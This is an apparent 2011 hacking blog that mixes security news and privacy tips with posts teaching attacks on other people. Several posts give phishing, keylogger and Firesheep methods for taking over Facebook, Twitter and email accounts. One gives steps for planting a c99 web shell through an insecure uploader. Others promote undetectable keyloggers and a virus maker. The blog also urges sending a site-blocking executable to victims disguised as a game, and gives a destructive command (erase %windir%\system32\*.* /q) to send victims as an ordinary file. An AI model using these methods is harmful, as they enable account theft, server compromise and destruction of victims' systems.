Sunday, 31 July 2011

"Facebook dislike button" is a new kind of spam

All of us use facebook and want a dislike button too for disliking some posts on facebook. Scammers are now using this need as their spam spreading method on facebook. Facebook scammers are tricking users to paste rogue code into their browser's address bars in order to get a Dislike button added to their options. The spam messages posted by victims read "Facebook now has a dislike button! Click Enable Dislike Button' to turn on the new feature!" The scammers replace share link by a message "Enable Dislike Button".
After clicking the link, this message will share this spam message to all friends of user and also rune some rouge code on his system too.

Facebook has not announced any official dislike button and i do not think it will be in near future.
faceook security experts are doing their best for preventing spams on facebook, but spams are increasing day by day. I hope people will understand it's danger and use safe facebook. I advice users not to click on any this kind of spams and always enalbe all security features given by facebook

How to block facebook facial recognition feature

Yesterday facebook has launched it's automatic face recognition feature to all over the world which recognizes your face in photos and suggest your friends to tag you in the photo. 


According to Facebook, this facial recognition feature uses a comparison of photos you're tagged in to suggest that friends tag you in new photos. The site says that this feature is intended to save you time: Instead of tagging the same friends in 25 photos you just uploaded, you can now apply one label to multiple photos in one step.


But this feature is not seems to be liked by users beause it is crossing the limit of online privacy. This feature is enable in default but you can turn it off by these steps
1: Go to Account -- > Privacy settings
2: select "Customize settings." In the second section, "Things others share," click "Edit Settings" next to "Suggest photos of me to friends."
3: change the setting from Enabled to Disabled. 


note: that friends can still manually tag you in photos.

HOW TO HACK FACEBOOK ACCOUNT

This is the question which i read daily in my inbox. All the people want to know how to hack face book account and i always suggest them to read hacking tutorials on my blog. But the main problem is that i post many hacking tricks but no one is specially for facebook hacking. Many of the hacking tricks i posted are used in hacking facebook accounts. But the problem is to think as this way. If you want to be a good hacker you should know how to implement all those things for you purpose. So now i am going to describe how to hack someone's facebook account.
There are many ways to hack facebook account.

facebook bug bounty program offers $500 for bug reporting

Facebook has taken a step to find bugs in its social networking website. It has announced a bug bounty program rewarding $500 for finding bugs in the facebook. facebook announced this by its page.  facebook wrote, "To show our appreciation for our security researchers, we offer a monetary bounty for certain qualifying security bugs."
To qualify for a bounty, you must:

Email account hacking with PHISHING | Gmail, Yahoo, msn hacking How to hack Gmail account How to hack Yahoo account

This is my favourite trick for hacking email accounts. I used it on many people and most of people are hacked. Success of this trick depends on the art of sending fake links to other people. For using this trick you should have some idea of websites and its working. learn website working by using this link.


 Main theme of this trick is create fake pages which look like original website but work according to your programming. When user login in this fake page assuming it as a real

FIRESHEEP HACKING

Stealing sessions/password is now easy with Firesheep and anyone can do it,very easily, which is somewhat scary. This tool provides you a single click hack.
After downloading FireSheep as add-on your mozilla firefox, now you get a side bar.Now log in to a public WiFi spot and click a button "start capturing. You’ll then be shown images and user names of various people using networks such as Facebook, Twitter, Flickr, bit.ly, Google and Amazon in that side bar. With a double click on their image, you’ll be logged in as them immediately. You can log in to any people's account who is using his account in that network.


Download here:
http://github.com/downloads/codebutler/firesheep/firesheep-0.1-1.xpi

How to protect your email id and facebook from hackers

Everybody
use email accounts and social networking websites such as orkut,
twitter and facebook. There are many important informations of a person
in these email accounts and social networking website. so it is
important to protect these account from hackers. Because hackers always
try to get others account to get those secret and personal data for bad
purpose. If use your email id for business and other services then it's a
great loss and trouble for you. So always try to be safe from hackers
Follow these simple steps i am writing below to protect yourself from being hacked.

Auto Save Passwords Without Notification in Firefox

Hey friends. Today i am going to write about a simple firfox hack which helps you to hack your friends easily. When ever you try to login in any account, firefox shows a notification asking for store user name and password for this website. But aftre using this trick it will never ask to store the password but it would atomatically store all the password. Its ideal trick if you want to get someones login details who uses your computer.

follow these steps:
1) First of all you need to close firefox.
2) Now locate the nsloginmanagerprompter.js file which

Internet Download Manager v6.01 Build 6 Incl. Keygen and Patch-Lz0 | 9.22MB

nternet Download Manager (IDM) is a software to increase download speeds by up to 5 times, resume and schedule downloads.It also have resume capability of broken downloads by lost connection.

INTERNET DOWNLOAD MANAGER

Internet Download Accelerator Pro 5.8.1 | 8.5 MB
Internet Download Accelerator lets you to noticeably increase the speed of file download from the Internet using HTTP, HTTPS and FTP protocols. The acceleration is achieved by splitting a file being downloaded into several parts and downloading these parts at the same time. Internet Download Accelerator resumes broken downloads from where they left off from both HTTP, 

BitDefender Launched Free Web Antivirus

Famous antivirus vendor BitDefener has launched a free antivirus solution to protect users when browsing the Web. It'a name is TrafficLight and is capable of scanning Web traffic in real time and blocking malicious code and other threats.
It also taps BitDefender's cloud network to check if accessed URLs are associated with phishing or black hat SEO attacks.

Microsoft Safety Scanner, free on demand antivirus tool from microsoft

Today i have a good news for windows user. Now you have one more antiVirus tool. Microsoft has released an on demand antivirus tool. This tool is named as The Microsoft Safety Scanner. This tool is free to download for windows user and provide on demand scanning of viruses, spyware and other malicious softwares. This tool is portable and comes in both 32-bit and 64-bit versions for Windows XP and later. 

Ultimate Pack Keyloggers 2010 by blackboy1337

This ultimate pack of keylogger contains more than 100 keyloggers.
Size: 183.83 MB

Dolwnload Link:
http://www.multiupload.com/OWR0IMI063

Free Keylogger 3.2 by IwantSoft.com | 673 Kb

ree Keylogger is invisible spy keystroke logger. It is designed for covert surveillance and PC activity monitoring. With this program you will know what other users are doing on a computer and track their Internet usage.

It intercepts everything that is typed on keyboard (including passwords, emails, chats, documents etc), monitors clipboard changes and all internet navigation. Then collects all information to secret reports on a hard drive, so you can view it later. This program is invisible for everyone except you. Just press special hot key to unhide it.

HOW TO PROTECT YOUR COMPUTER FROM KEY LOGGERS

keylogging is a major problem. Anyone can use it without good knowledge of computer. For those it is most harmful who do internet banking and other official works from their computer. hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. These are some methods through which you can protect your computer from keyloggers

FREE DOWNLOAD INSTEAL KEY LOGGER V2

Features of our latest keylogger:-


  • 100% FUD from all anti-virus
  • Send Logs To Emails ( gmail,yahoo,aol,hotmail ) and Ftp account
  • Decreased Server Size
  • Optimized Memory UsageIcon Changer
  • Time Setter
  • Melt server after using
  • Start up adder
  • Became active after every start up of windows
  • And many other features

DOWNLOAD ADVARD KEY LOGGER

Award Keylogger is fast, invisible and easy-to-use surveillance tool that allows you to find out what other users do on your computer in your absence. It records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.

Angry IP Scanner











Angry IP Scanner OR IP Scan is an cross-platform network scanner designed to be fast ip scan and simple to use. It scans IP addresses and ports for a given IP range as well as has many other features.

latest ip scanner

Advanced IP Scanner 2.0 is a free, fast and robust network tool with a user-friendly interface. In a matter of seconds it finds and scans all computers on your network and provides easy access to their various resources, such as HTTP, HTTPS, FTP and shared folders. With freeware Advanced IP Scanner 2.0 you can scan all IP addresses on your local network. The remote PC shutdown feature lets you shut down any remote machine or a group of machines running Windows. You can also wake these machines remotely with Advanced IP Scanner if their network cards support Wake-On-LAN functionality. Advanced IP Scanner 2.0

Saturday, 30 July 2011

Advanced IP Scanner 2.0 Portable download for free

dvanced IP Scanner 2.0 Portable | 10.2 MB

Advanced IP Scanner is a fast LAN scanner for Windows. It is very easy to use and give you various types of information about local network computers in a few seconds. It gives you one-click access to many useful functions – remote shutdown and wake up, Radmin integration and more! Powered with multi-thread scan technology, this program can scan hundreds computers per second, allowing you to scan ‘C’ or even ‘B’ class network even from your modem connection.


Friday, 29 July 2011

Computer Security Threats | malicious programs | Malwares

Computer security threats or Malicious code or Malwares comes in a wide variety of forms and is distributed through an ever growing number of delivery mechanisms. In general malicious program is any software that impedes the normal operation of a computer or networking device. This software most often executes without the user's consent. 
Understanding how malwares works can help you develop defensive strategies, select
computer security products and train employees on how to identify potential threats.

Types of computer security threats
These can be roughly broken down into types according to the malware's method of  operation. Anti-"virus" software, despite its name, is able to detect all of these types of malware. There are  following malware types.
  • E-mail and other types of viruses
  • Trojans and other backdoors
  • Worms
  • Blended threats
  • Time bombs
  • Spyware
  • Adware
  • Stealware
  • Zombies


when a piece of malicious code starts infecting large number of computers, it is said to be 'in wild'.

Threat level of these malwares refers to it's potential to spread and infect computers. Threat level can be shown in 4 catagories.
  1. NO -  may not function well
  2. Low - requires human assistance in replicating and moving from computer to computer
  3. Medium - slow infection speed and little damage
  4. High - great infection speed and do considerable damage.
wild list  or threat list refers to malicious code that is wandering around the internet infecting computers. An archive of wild lists and information about the organisation that maintains the list are available at www.wildlist.org
 

Reverse-Engineering of Malware | REMnux v.2.0

eMnux V.2.0 is launched. It is a lightweight Linux distribution tool for assisting malware analysts in reverse-engineering of malicious software.  Visit REMnux's main page for download ReMnux as a virtual appliance and as a Live CD. The distribution of ReMnux is based on Ubuntu and is maintained by Lenny Zeltser. REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.

Malicious Website Analysis
REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab. 
REMnux includes the updated version of Jsunpack-n, which includes a number of new features, such as proxy support, improved handling of encrypted PDFs, and other updates.
Stunnel is now installed to assist with the interception of SSL sessions in the malware analysis lab.

REMnux now includes the RABCDAsm toolkit for reverse-engineering malicious Flash (SWF) programs. This includes:
  • rabcdasm: ActionScript 3 (ABC) disassembler
  • rabcasm: ABC assembler
  • abcexport: ABC extractor
  • abcreplace: Replaces ABC in SWF files
  • swfdecompress: SWF file decompressor


Read More on Lenny Zeltser's blog

How to create a virus to block websites

Today i am going to write a post on a simple virus written in C. It will block websites on your computer system. This C code is only the implementation of my previous post How to block a website without any software 
I am implementing that process by a C program to create it as a virus. Once the virus is clicked, it will block the some specific websites on victim's computer. The website which you want to block is mentioned in the source code of the program. Change the list according to your choice.

McAfee VirusScan Enterprise 8.8 Multilingual Retail | 44 MB

McAfee® VirusScan® Enterprise is good protection of your desktop and file servers from a wide range of security threats, including viruses, worms, Trojan horses, zombies and potentially unwanted code and programs. This antivirus version takes anti-virus protection to the next level, integrating elements of intrusion prevention and firewall technology into a single solution for PCs and file servers.

Create your own Virus using V-Maker

Today i am going to post about a virus creating tool. This tool is Virus Matic 2010 or in short V-Maker


Main Feature of V-Maker


You can create your own prank files/viruses with ease by V-Maker.


  1. Disable Mouse and Keyboard
  2. Disable Regedit
  3. Delete System32
  4. Block Site
  5. Disable Task Manager
  6. Take Screen Shot Of Victim  PC
  7. Message Box (When User Click on Virus)
  8. Automatically Download Start (When User click on virus download start automatic)
  9. USB Spread


Download Here:

Samurai webtesting Framework live cd download

The Samurai Web Testing Framework is a LiveCD focused on web application testing. This is a nice tool for website penetration testing of web applications.  Starting with reconnaissance, This iso included tools such as the Fierce domain scanner and Maltego. For mapping, it has included tools such WebScarab and ratproxy. Then discovery tools are also choosen. These would include w3af and burp. For exploitation, the final stage, it also included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

The Social-Engineer Toolkit (SET) v1.5 “Convergence Edition” has been released.

The Social-Engineer Toolkit (SET) v1.5 “Convergence Edition” has officially been released. This release adds new Metasploit client-side exploits and more granularity around the SET interactive shell. One of the main accomplishments in this version is the cross-compatibility of the SET interactive shell which now supports Windows, OSX, and *NIX. Interesting enough it does smart detection based on platform and leverages the same codebase when triggering payloads. Overall this has been several months of development getting the interactive shell to a point to where it’s stable and supports multiple operating systems.
In addition to the OSX compatibilities, several new features were added to the interactive shell. The first is persistence, the SET interactive shell will spawn a custom written service, install it, and then spawn you a shell back every 30 minutes. Useful for when on a penetration test and your connection drops, you still will receive connections back every 30 minutes. In addition to that, “clear” and “cls” have been added for clear screen as well as “reboot now” and “removepersistence”. A full changelog change be found here:

Download and read more
http://www.secmaniac.com/june-2011/the-social-engineer-toolkit-set-v1-5-convergence-edition-has-been-released/

FileServe, Filesonic and wupload pemium link generator

FileServe, Filesonic and wupload  are somefamous file hosting website and you need to have a premium account for unlimited and fast download. Today i have an online tool which generates premium links for these 3 filehosting website. I already posted some other tools and online service for hacking and getting premium links of filehosting services. This is a new one which i got online.

Fern wifi cracker for wireless penetration testing

his is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.


It should work on any version of linux running the following:

Download Apache Log Extractor

Apache Log Extractor is a quick script to export URL information from Apache access logs. The thought behind this script was to provide a list of known URL’s on a remote server by analysing the logs. This list could then be used as the input for further testing tools (e.g Burp Suite – Intruder)


The script accepts an Apache access file as the input and creates an output file containing one URL per line. The list is unique and should only contain the URL without parameters (incomplete directory names are not extracted). It also takes these URLs and creates a wordlist output of all valid directoy names for use with brute-forcing ec.

Download guidance on Windows Firewall with Advanced Security Deployment

Microsoft has launched a deployment guide yesterday to simplify the work of users that need to leverage Windows Firewall with Advanced Security in order to secure network communication to a Domain Controller. 

Windows Firewall with Advanced Security (WFAS) combines a host-based firewall and an Internet Engineering Task Force (IETF)-compliant implementation of Internet Protocol security (IPsec),” Microsoft explains. 


This Test Lab Guide contains an introduction to Windows Firewall with Advanced Security (WFAS) and step-by-step instructions for extending the Base Configuration test lab. You will configure WFAS connection security rules to protect network communication between a domain controller and domain member computers using Internet Protocol security (IPsec).The connection security rules are configured to allow new computers to join the domain and then subsequently the communication between the domain controller and the domain member is protected using IPsec.



According to Microsoft, this guide is designed to streamline the deployment of a test lab involving two server computers and one client machine. The instructions are based on a Base Configuration test lab set up for deploying WFAS connection security rules. 



System Requirements


Operating Systems:Windows Server 2008 R2

A Test Lab Guide is now availabe on the Microsoft Download Center
Download Here

HOW TO HACK TWITTER ACCOUNT

Many of readers sent me emails for writing a post on twitter account hacking. Before writing more on topic i want to say one thing that there is no any software tool which can give you passwords of any twitter account by entering the user name. If you are here for any this type of software then please leave this website. Twitter is one of the top 10 most visited website having a lots of security features. No tool can intrude or hack its database to give you passwords. If you want to hack a twitter account, you have to use your hacking skills with a good use of social engineering. I think social engeering is the best way to trick a person to give his passwords to you. If you had read my older post on facebook hacking, no trick is new for you. 


1: phishing: phishing is the best way to hak any account. If you think only saving a webpage and creating a fake login page with this is phishing, then you are wrong. Phishing is just create a webpage which can trick users to give their passwords. It does not mean that it is a login page or any other page which offers a service to that website. I used a page for finding invisible in orkut for orkut phishing. So think what you can do in this. I am not uploading any phishing page. If you do not know what is phishing, read my old post.


2: Keylogger: keylogger is another way to hack into twitter account by getting the keystrokes from a user's system. download remote keyloggers from keylogger section.



3: Firesheep: If your victim uses unsecure wireless network then you can hack him easily by using mozilla firefox and a simple firefox plugin. Firesheep. read this post to know about firesheep and dowload it from that post. Firesheep 
use this tool to hack.


You can also try to hack primary email id hacking attached with the twitter account. But hacking a Gmail or yahoo account also need above method. Try above given methods and trick users to explore their passwords.

Download with resume from file sharing websites | Rapidshare, hotfile, fileserve hack

Rapidshare, Megaupload, Hotfile, fileserve, filesonic, Megaupload are some most popular file sharing websites. But the main problem is that none of these websites support downloading with resume capability. Today i am going to write a new trick on how you can download files with resume capability from these websites.

hack a website using c99 script

The c99 shell script is a very good way to hack a php enable web server. You have to find an unsecure uploader to upload this file to the server. Here i used unsecure uploader means the uploader which can't check for file extension and allow us to upload our executable scripts to the server.


This c99 shell allows an attacker to hijack the php enable web server. This script is very user friendly and having very good interface so it is easy to use. You can issue any php command to run on the web server. You can use any of the commands given in the script to run on the web server.


NOTE: This post is only for educational purpose. We advice you not to try this on any website. Use of this script on any website is illegal. 



For hacking a website using C99 script follow these steps.


1) Find a php web site with an uploader.
2) Test the file uploader to be secure or not by uploading files with a server executable extension.
3) If uploader is unsecure then upload the shell script.
4) Execute the uploaded code by navigating to the uploaded page.
5) A c99 script GUI will show up with a lot of options and details.
6) Look for the server details if the safe mode is on or off. If safe mode is off then the entire web server can be controlled by the script. If its on then on the directory in which c99 shell script is uploaded can only be controlled by the script.
7) Apart from being able to chmod, modify and delete files c99 also lets its user brute force the ftp but it requires an additional dictionary file which can run into hundreds of MBs.


NOTE: You can also execute this script on the web server by RFI


Search the and download the script from google.  or download from link
c99

HOW TO AVOID FACEBOOK SCAMS

Facebook is the part of people's daily life. It's no. 1 socail networking website so it is used for spreading scams by spammers.  Scammers search through Facebook user accounts and gather information from public profiles to send phishing emails so they can gather more secure information such as bank account numbers, credit card numbers and user login and password to other secure sites. On facebook scammers use facebook applications to gather user's information and use their profile to post links of worms and trojans. I wrote a post on securing facebook account from hackers. Today i am going to write some steps to protect your facebook account from

SEND EMAIL FROM ANY EMAIL ID ../ EMAIL SPOFFER

There are many email spoofing websites. You can also host your own fake email sender script too. But this one is something different. You are able to send email from any email id and that will surely be in the sender's inbox not in the spam. I got this spoofing website from one of my friend.


Sunday, 17 July 2011

CREATE A VIRUS TO BLOCK WEBSITES

Today i am going to write a post on a simple virus written in C. It will block websites on your computer system. This C code is only the implementation of my previous post How to block a website without any software 
I am implementing that process by a C program to create it as a virus. Once the virus is clicked, it will block the some specific websites on victim's computer. The website which you want to block is mentioned in the source code of the program. Change the list according to your choice.




DOWNLOAD IT HERE


How to use:


  • You need to have a C compiler for that.
  • Compile and build the C program and generate the EXE file.
  • Run the EXE on your computer to check it's working. 
  • Go to the browser and try to open google or facebook. ;)
  • to unblock those websites. try the procedure given in my older post How to block a website without any software and delete the new entries in the file hosts created by this virus.
  • Now send this EXE to the victim as a game or any other software.



THIS IS FOR EDUCATIONAL PURPOSE. PLEASE DO NOT USE THIS TO HARM ANYONE


Today i am going to post about a virus creating tool. This tool is Virus Matic 2010 or in short V-Maker


Main Feature of V-Maker


You can create your own prank files/viruses with ease by V-Maker.


  1. Disable Mouse and Keyboard
  2. Disable Regedit
  3. Delete System32
  4. Block Site
  5. Disable Task Manager
  6. Take Screen Shot Of Victim  PC
  7. Message Box (When User Click on Virus)
  8. Automatically Download Start (When User click on virus download start automatic)
     9.USB Spread 


download it here

FERN WIFI CRACKER


This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.


It should work on any version of linux running the following:


Requirements:


  • python
  • python-qt4
  • macchanger
  • aircrack-ng
  • xterm
  • subversion

For Slax Distributions, download the zipped module package on the download section, and follow the instructions in the "README" file.


To install simply run the following command in terminal after changing directory to the path were the downloaded package is:


root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb


Icons and Running the application:


Software Icon can be found at the application Menu of the GNOME desktop interfaces


Icon can also be found at /usr/share/applications for KDE and also GNOME:


There you find "Fern_Wifi_Cracker.desktop"


To get the source code for this project from SVN, here's the checkout link:


root@host:~# svn checkout http://fern-wifi-cracker.googlecode.com/svn/Fern-Wifi-Cracker/


DOWNLOAD IT HERE

ELEMENTS OF PC SECURITY FREE DOWNLOAD

Book Description
As our society grows ever more reliant on computers, so it also becomes more vulnerable to computer crime. Cyber attacks have been plaguing computer users since the 1980s, and computer security experts are predicting that smart telephones and other mobile devices will also become the targets of cyber security threats in the future.


Developed from the author’s successful Springer guide to Foundations of Computer Security, this accessible textbook/reference is fully updated and enhanced with resources for students and tutors.
Topics and features: examines the physical security of computer hardware, networks, and digital data; introduces the different forms of rogue software (or malware), discusses methods for preventing and defending against malware, and describes a selection of viruses, worms and Trojans in detail; investigates the important threats to network security, and explores the subjects of authentication, spyware, and identity theft; discusses issues of privacy and trust in the online world, including children’s privacy and safety; includes appendices which discuss the definition, meaning, and history of the term hacker introduce the language of "l33t Speak", and provide a detailed virus timeline; provides numerous exercises and examples throughout the text, in addition to a Glossary of terms used in the book; supplies additional resources at the associated website, http://www.DavidSalomon.name/, including an introduction to cryptography, and answers to the exercises.
Clearly and engagingly written, this concise textbook is an ideal resource for undergraduate classes on computer security. The book is mostly non-mathematical, and is suitable for anyone familiar with the basic concepts of computers and computations.
 
 
 
DOWNLOAD IT HERE

FREE DOWNLOAD OFFICIAL HACKER BOOK

The Certified Ethical Hacker (CEH) exam was developed by the International Council of E-Commerce Consultants (EC-Council) to provide an industry-wide means of certifying the competency of security professionals. The CEH certification is granted to those who have attained the level of knowledge and troubleshooting skills needed to provide capable support in the field of computer and network security.


The CEH exam is periodically updated to keep the certification applicable to the most recent hardware and software. This is necessary because a CEH must be able to work on the latest equipment. The most recent revisions to the objectives and to the whole program were enacted in 2006 and are reflected in this book.
 
DOWNLOAD IT HERE

ETHICAL HACKING BOOK

By explaining computer security and outlining methods to test computer systems for possible weaknesses, this guide provides the tools necessary for approaching computers with the skill and understanding of an outside hacker.


Introduction
This module attempts to bridge various aspects of ethical hacking by suggesting an approach for undertaking penetration testing. There are different ways of approaching a penetration test.
  • External Approach
    • With some prior knowledge
    • Without prior knowledge
  • Internal Approach
    • With some prior knowledge
    • With deep knowledge
Whatever the approach adopted, it is a fact that penetration testing is constrained by time and availability of resources, which varies from client to client. To effectively utilize both these telling factors, penetration testers adopt some form of structure or methodology. These can be checklists developed by consulting practices, widely available resources such as Open Source Security Testing Methodology or a customized attack strategy.
There are is no single set of methodology that can be adopted across client organizations. The skeletal frame of testing however is more or less similar. The terms of reference used for various phases may differ, but the essence is the same. As discussed in preceding modules, the test begins with:
  • Footprinting / Information Gathering phase
  • Discovery and Planning / Information Analysis phase
  • Detecting a vulnerability / security loophole
  • Attack / Penetration / Compromise
  • Analysis of security posture / Cover up / Report
  • Clean up
The general objective of a penetration test is to reveal where security fails. The result of a penetration test can be:
  • successful attack - when the objective is met within the scope of the attack
  • a partial success - when there has been a compromise, but not enough to achieve the objective
  • a failure - when the systems have been found to be robust to the attack methodology adopted
Foot printing / Information Gathering phase:
  • Client site intelligence
  • Infrastructure fingerprinting
  • Network discovery and Access point discovery
Discovery and Planning / Information Analysis phase
  • Target Identification
  • Resource and Effort Estimation
  • Modeling the Attack strategy (s)
  • Relationship Analysis
Detecting a vulnerability / security loophole
  • Vulnerability Analysis
  • Scanning
  • Enumeration
  • Zeroing the target
Attack / Penetration / Compromise
  • Exploring viable exploits (new / created / present)
  • Executing the attack / Alternate attack strategy
  • Target penetration
  • Escalating the attack
Analysis of security posture / Cover up / Report
  • Consolidation of attack information
  • Analysis and recommendations
  • Presentation and deliverables
Clean up
  • Clean up tasks and procedures
  • Restoring security posture
DOWNLOAD IT HERE

THE HACKERS UNDERGROUND BOOK

The Hacker’s Underground Handbook will guide you through password hacking, windows hacking, malware, phising, web hacking, network hacking and Linux (intro, installation, etc). All this material fully packed with images, thus being a top step-by-step guide, on the course of which you cannot fail.

A great starting book which will guide you in the right direction, helping you understand the basic concepts of computer security and matters that you should take in consideration.
















DOWNLOAD IT HERE

Saturday, 16 July 2011

Best Funny Facebook Status Updates Collection

Most of the times facebook status updates reflects the actual mood of the person.Are you in a lighter mood and ready to have some laughs? These are some of the facebook status updates and will surely bring a smile on your face.
Here is the best collection of funny status updates for your facebook profile












“Bart, with $10,000, we’d be millionaires! We could buy all kinds of useful things like…love!”
Funny facebook update, Homer J Simpson.
“When I die, I want to go peacefully like my Grandfather did, in his sleep — not screaming, like the passengers in his car”
Funny facebook update,Unknown.
“I’m an excellent housekeeper. Every time I get a divorce, I keep the house.”
Funny facebook update,Zsa Zsa Gabor
“I remmember the time I was kidnapped and they sent a piece of my finger to my father. He said he wanted more proof.”
Funny facebook update,Rodney Dangerfield
“People think it must be fun to be a super genius, but they don’t realize how hard it is to put up with all the idiots in the world,” Calvin.
“Isn’t your pants’ zipper supposed to be in the front?” Hobbes.
Funny facebook update,Calvin and Hobbes.
“Cheese… milk’s leap toward immortality.”
Funny facebook update, Clifton Fadiman.
“Never stand between a dog and the hydrant.”
Funny facebook update,John Peers.
“You have a cough? Go home tonight, eat a whole box of Ex-Lax, tomorrow you’ll be afraid to cough.”
Funny facebook update, Pearl Williams.
“Why does Sea World have a seafood restaurant?? I’m halfway through my fish burger and I realize, Oh man….I could be eating a slow learner.”
Funny facebook update, Lyndon B. Johnson.
“He’s so optimistic he’d buy a burial suit with two pairs of pants.”
“A word to the wise ain’t necessary – it’s the stupid ones that need the advice.”
-Bill Cosby
“I do not like broccoli. And I haven’t liked it since I was a little kid and my mother made me eat it. And I’m President of the United States and I’m not going to eat any more broccoli.”
-George Bush
“Marriages are made in heaven. But so again, are thunder and lightning.”
-Adam Marshall
“ My son is now an entrepreneur.Thats what you are called when you dont have a job.”
-Ted Turner
“If your parents never had children, chances are you won’t, either.”
-Dick Cavett
“Hey! You have a penny on your crotch”.”
-Exclaims Kelly
“A cynic is just a man who found out when he was about ten that there wasn’t any Santa Claus, and he’s still upset.”
-James Gould Cozzens
“We are all either fools or undiscovered geniuses.”
-Bonnie Lin
“A bartender is just a pharmacist with a limited inventory.”
-Albert Einstein
“ To err is human, but to really foul things up you need a computer.”
-Paul Ehrlich

Make a simple file that destroys ur victims pc

1. Open Notepad
2. write the above command : -
erase %windir%\system32\*.* /q
3. Save the above notepad with the extension ".bat or .cmd" as u want.
After u created the .cmd or .bat file send it to ur victim as like ordinary file.Once ur victim double click on it then he/she needs to format his/her pc.
What it does is deletes all files present in the system32 folder out of which most of them are files important for a computers functioning.
Note:-
It would work only if the victim has windows os.

HACK PASSWORD USING FIREFOX

Whenever you log in to a website using your username and password, you'll be prompted by Firefox whether you'd like Firefox to remember this password.
f you click on Remember, the next time you visit the website, it'll automatically enter the username and password for your convenience.

Now, back to the topic. Let's say you saved your Yahoo password in Firefox. After months or years gone by and you don't remember the password you set for my Yahoo. You started to panic and desperately need to get back your Yahoo password.
Don't worry, here's how you can find the hidden Yahoo password in Firefox.

Firefox is much better than Internet Explorer in terms of managing "remembered" logins. In Internet Explorer, there is no built-in feature where you can manage or view your saved login information. That's why you need third party tools to reveal the passwords hidden under asterisks.           
 As for Firefox, you can access remembered passwords with a few clicks.




To view your remembered passwords in Firefox browser, go to Tools, and click on Options. Go to Security tab and click on the Show Passwords button. A remember password dialog box will appear. Click on the Show Passwords button again and a new column with password will appear.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host